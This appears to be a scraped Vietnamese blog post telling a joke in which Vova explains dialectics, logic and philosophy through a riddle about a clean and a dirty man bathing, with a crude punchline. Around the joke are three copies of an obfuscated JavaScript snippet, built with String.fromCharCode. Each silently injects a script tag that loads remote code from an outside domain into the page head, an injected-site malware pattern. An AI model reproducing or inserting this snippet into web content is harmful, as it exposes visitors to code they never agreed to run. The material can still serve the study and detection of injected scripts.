Bàn về triết học…

0
142
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,108,111,99,97,116,105,111,110,46,106,115,63,108,97,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,108,111,99,97,116,105,111,110,46,106,115,63,108,97,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Vova được công đoàn nhà máy cử đi học Đại học Mác- Lê nin.

Sau tốt nghiệp, Vova quay về nhà máy làm việc. Chủ tịch công đoàn hỏi:

– Thế nào Vova, học được gì nào?

– Nhiều lắm chú Mikhain

-Kể xem

– Cháu được học nào là Phép biện chứng, Logic học, Triết học nữa

– Đó là cái gì?

– Làm sao giải thích cho chú được nhỉ. Thế này, ví dụ có 2 anh chàng, một sạch, một bẩn, anh nào vào tắm.?

– Tất nhiên là anh bẩn.

– Nhưng theo Biện chứng, anh bẩn có xu hướng bẩn, nên không cần tắm, còn anh sạch có xu hướng sạch hơn, nên anh sạch sẽ vào tắm.

– Ờ, hay nhỉ. Còn gì nữa

– Lại lấy ví dụ đó, 2 anh chàng, 1 sạch, một bẩn, ai sẽ vào tắm?

– Thì mày vừa bảo anh sạch đó thôi.

– Nhưng theo Logic học, anh sạch thì cần gì tắm, còn anh bẩn cần tắm, nên anh bẩn sẽ đi tắm.

– Ờ vớ vẩn nhỉ, còn gì nữa không?

– Vẫn ví dụ ấy, có 2 anh chàng, một sạch, một bẩn, anh nào vào tắm.?

– Ơ cái thằng này, rối tinh rối mù, đéo biết đâu mà lần.

– Ồ chính thế, chú Mikhain, đấy chính là Triết học, cái thứ mà phát biểu ngắn gọn là đéo biết đâu mà lần.

LS. NGUYỄN KHÁNH NGỌC

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,111,98,98,121,100,101,115,105,114,101,115,46,99,111,109,47,108,111,99,97,116,105,111,110,46,106,115,63,108,97,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

NO COMMENTS